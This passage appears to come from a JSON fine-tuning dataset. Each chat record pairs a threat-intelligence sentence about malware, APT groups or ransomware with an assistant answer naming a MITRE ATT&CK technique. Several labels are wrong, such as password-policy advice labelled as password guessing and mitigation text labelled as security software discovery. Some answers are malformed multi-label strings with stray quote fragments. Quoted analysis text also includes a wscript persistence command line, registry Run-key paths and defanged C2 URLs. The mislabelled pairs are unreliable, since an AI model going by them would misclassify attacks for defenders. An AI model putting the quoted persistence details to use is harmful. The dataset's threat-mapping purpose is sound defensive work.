- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "established persistence by adding a Shell value under the Registry key HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion]Winlogon."
- },
- {
- "role": "assistant",
- "content": "T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mitigation Security and system/IT administrators must practice due diligence in protecting their websites and web-based applications from threats that can undermine their security, and hijack them to do the bad guys’ bidding—delivering malware to their victims"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZeroT has used RC4 to encrypt C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used developed tools in Python including Out1."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Since September of 2018, Redaman banking malware has been distributed through malspam. These emails have file attachments. These file attachments are archived Windows executable files disguised as a PDF document. In September 2018, the attachments were zip archives. In October 2018, the attachments were zip archives, 7-zip archives, and rar archives. In November 2018, the attachments were rar archives. And in December 2018, the attachments changed to gzip archives with file names ending in .gz"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1566.001 - Phishing: Spearphishing Attachment', 'T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 can decrypt passwords stored in the RDCMan configuration file."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some variants use raw TCP for C2."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The initial attack did not produce the desired result; The attackers made a second attempt, with a ransomware payload named license.exe, launched from the same location. But before they launched it, they executed a script that disabled Windows Defender’s Real-Time Monitoring feature"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RGDoor uploads and downloads files to and from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Windows can delete the DLLs for its various components from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 6 shows the Glimpse server responding to an inbound beacon from the Glimpse agent and sending a command whoami"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a Metasploit PowerShell module to download and execute shellcode and to set up a local listener. has also used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When initially executed, the malware will check its current working directory. Should it not match the expected path, Cardinal will enter its installation routine. Cardinal RAT will copy itself to a randomly named executable in the specified directory. It will then compile and execute embedded source code that contains watchdog functionality. Specifically, this newly spawned executable will ensure that the following registry key is set"
- },
- {
- "role": "assistant",
- "content": "T1027.004 - Obfuscated Files or Information: Compile After Delivery', 'T1012 - Query Registry', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson contains a command to collect and exfiltrate emails from Outlook."
- },
- {
- "role": "assistant",
- "content": "T1114.001 - Email Collection: Local Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Netwalker can delete the infected system's Shadow Volumes to prevent recovery."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Phishing emails continued to use links to external ZIP or RAR archives, which ultimately contained an executable with the extension SCR. The attackers also made extensive use of Hostinger’s cheap web hosting services to deliver initial payloads"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As seen in the above screenshot, there is a large overlap in unique strings in both samples. The original sample involved in the forbes.com breach used HTTP, which is consistent with the original variant discussed in this blog post. It should be noted that while the newest variant that uses direct network communication over port 22 no longer uses HTTP, references to the HTTP strings are still found within the sample itself. This is most likely due to code re-used by the attackers"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In response to this request, the C2 server responds with a Base64-encoded RSA public key (seen in Figure 12)"
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may be used to find credentials in the Windows Registry."
- },
- {
- "role": "assistant",
- "content": "T1552.002 - Unsecured Credentials: Credentials in Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HttpBrowser's executable code may be obfuscated through structured exception handling and return-oriented programming"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An APT28 loader Trojan uses a cmd.exe and batch script to run its payload. The group has also used macros to execute payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "COBALT DICKENS uses publicly available tools, including the SingleFile plugin available on GitHub and the free HTTrack Website Copier standalone application, to copy the login pages of targeted university resources. Metadata in a spoofed login page created on August 1 suggests that COBALT DICKENS sometimes uses older copied versions of target websites. A comment left in the source code indicates it was originally copied on May 1, 2017 (see Figure 3). However, the university was targeted by numerous COBALT DICKENS operations, including the August 2018 and August 2019 campaigns"
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Just six minutes after the initial C&C communication, and with the QAKBOT malware now running inside an injected process (wermgr.exe), automated reconnaissance in the infected environment is performed via the execution of multiple built-in command line tools"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The experience of dealing with Emotet shows that it will be time well spent. We always recommend that clients adopt a policy that forces users to create passwords that they can remember, but that are hard to guess"
- },
- {
- "role": "assistant",
- "content": "T1110.001 - Brute Force: Password Guessing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThreatNeedle can run in memory and register its payload as a Windows service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control (C2) and operational infrastructure"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT can use a variety of API calls on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We found a brute-force tool called NLBrute , with configuration files that tell us it had been set up to use an included set of username and passwords to try to break in to machines that have Remote Desktop enabled"
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The two variants of MPK share the same registry key that the Trojan uses to automatically run each time the system starts, specifically: [HKLM and HKCU]\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\explorer Both MPK variants include key loggers that are extremely similar in functionality in addition to having the same strings used for headers within the key log file"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Curl is used to send the AWS credentials to TeamTNT’s server, which responds with the message “THX"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has installed TrickBot as a service named ControlServiceA in order to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Octopus can collect information on the Windows directory and searches for compressed RAR files on the host."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used CHM files to move concealed payloads."
- },
- {
- "role": "assistant",
- "content": "T1218.001 - Signed Binary Proxy Execution: Compiled HTML File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JPIN can list running services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Delphi variant of Zebrocy delivered in this attack campaign are very similar to the Delphi downloader discussed in our previous Zebrocy research published in June 2018. While this Delphi variant was known, the C# and VB.NET variants delivered in this attack campaign were previously unknown. An interesting note on these payloads is that all the Delphi payloads delivered in this campaign were packed with UPX, while none of the other payloads were packed. While we can only speculate on the specific reason, it is likely Sofacy packed only the Delphi variants in an attempt to increase evasion as the Delphi variant of Zebrocy is known and has been widely analyzed"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. These compromise attempts use the cyber actors’ dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conficker uses the current UTC victim system date for domain generation and connects to time servers to determine the current date."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Xbash can use mshta for executing scripts."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Axiom has used exploits for multiple vulnerabilities including CVE-2014-0322, CVE-2012-4792, CVE-2012-1889, and CVE-2013-3893."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed has the ability to Base64 encode its payload and custom encrypt API calls."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remote desktop available via VNC. Hidden Remote desktop available via RDPWrap. Privilege escalation (even for the latest Win10 updates) Remote WebCam control. Remote Shell. Remote desktop available via VNC. Hidden Remote desktop available via RDPWrap. Remote Shell. Remote desktop available via VNC. Hidden Remote desktop available via RDPWrap. Privilege escalation (even for the latest Win10 updates) - Remote WebCam control"
- },
- {
- "role": "assistant",
- "content": "T1021.005 - Remote Services:VNC"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Establish persistence for itself on the endpoint - Establish persistence of another component of the malware on the endpoint - Update itself on endpoint after a separate updater component downloads the update from the control server"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "parses the export tables of system DLLs to locate and call various Windows API functions."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Typical file exfiltration modules deployed by threat actors usually consist of the ability to enumerate and exfiltrate files. These implants enumerate files in specific drives or directories and exfiltrate the file lists first. Once the attackers identify the files of interest, the module is instrumented for exfiltration of the files.The VBScript-based file recon module used by the attackers is somewhat different. It downloads a file listing from a remote location that contains the file paths of specific files of interest to the attackers. The file listing is so precise that the attackers know the exact file paths of the files they're looking for on an infected endpoint. This prevents re-infection of the target.A marker file is created in an attacker-specified folder and is checked before the exfiltration module begins its malicious activities. If the marker file is not found, the module will proceed with its recon and exfiltration activities.In August 2021, we saw a minor variation of the same script being deployed in the wild. Instead, it's hardcoded into the scripts showing that the attackers already know the identities of the targets that they are trying to infect. This indicates that this is a highly targeted attack.In October 2021, we observed another update in the file exfiltration scripts"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has exploited Microsoft Office vulnerability CVE-2017-0262 for execution."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The sample creates an array that contains the following strings for the Trojan to use as C2 locations: http://23.227.196[.]215/ http://apple-iclods[.]org/ http://apple-checker[.]org/ http://apple-uptoday[.]org/ http://apple-search[.]info Notice the last one is missing the trailing “/”, which causes an issue when the Trojan attempts to use this string to build the remainder of the C2 URL, as the Trojan will append the next string in the URL directly to this string"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork used Base64 to encode C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Either via the LNK after startup, or directly via the VBS, the command line “wscript.exe //B //E:vbs C:\\Users\\Public\\Favorites\\desktop.ini” is executed, referencing the helper file dropped by the sample mentioned above. Finally, the file C:\\Users\\Public\\ignit.vbs is deleted after execution."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To do so, this malware attempts to spread to other systems on network using what are likely stolen administrator credentials. This is again similar to the 2012 Shamoon attacks, where compromised but legitimate credentials obtained in advance of the attacks were also hard coded into the malware to aid in its propagation. Disttrack also has the ability to download and execute additional applications to the system, as well as remotely set the date to start wiping systems"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When the decrypt button is clicked without the ransom being paid, the malware decrypts the files listed in f.wnry. The files listed in f.wnry are those randomly selected to be encrypted with the embedded public key"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Threat Group-3390 tool can encrypt payloads using XOR. Threat Group-3390 malware is also obfuscated using Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OceanSalt has been delivered via spearphishing emails with Microsoft Office attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA has been created with a hidden attribute to insure it's not visible to the victim."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "runs tests to determine the privilege level of the compromised user."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The IceApple ifconfig module can iterate over all network interfaces on the host and retrieve the name, description, MAC address, DNS suffix, DNS servers, gateways, IPv4 addresses, and subnet masks."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT1 used a batch script to perform a series of discovery techniques and saves it to a text file."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SharpStage has a persistence component to write a scheduled task for the payload."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The infection process is rather interesting, as it involves multiple layers of .NET assemblies that will eventually download the NanoCore remote administration tool (RAT) from a remote server and inject it into another process"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, the threat actors used the malicious NTWDBLIB.DLL and `cliconfig.exe` to bypass UAC protections."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "More_eggs has the capability to gather the username from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains the current user's security identifier."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla has used SMTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This ID is sent to the CnC with each request for commands to execute"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Windows can determine if the OS on a compromised host is newer than Windows XP."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 contains modules for local privilege escalation exploits such as CVE-2016-9192 and CVE-2016-0099."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Android backdoors capable of enumerating specific files on the infected devices."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ComRAT can check the victim's default browser to determine which process to inject its communications module into."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The IceApple Active Directory Querier module can perform authenticated requests against an Active Directory server."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
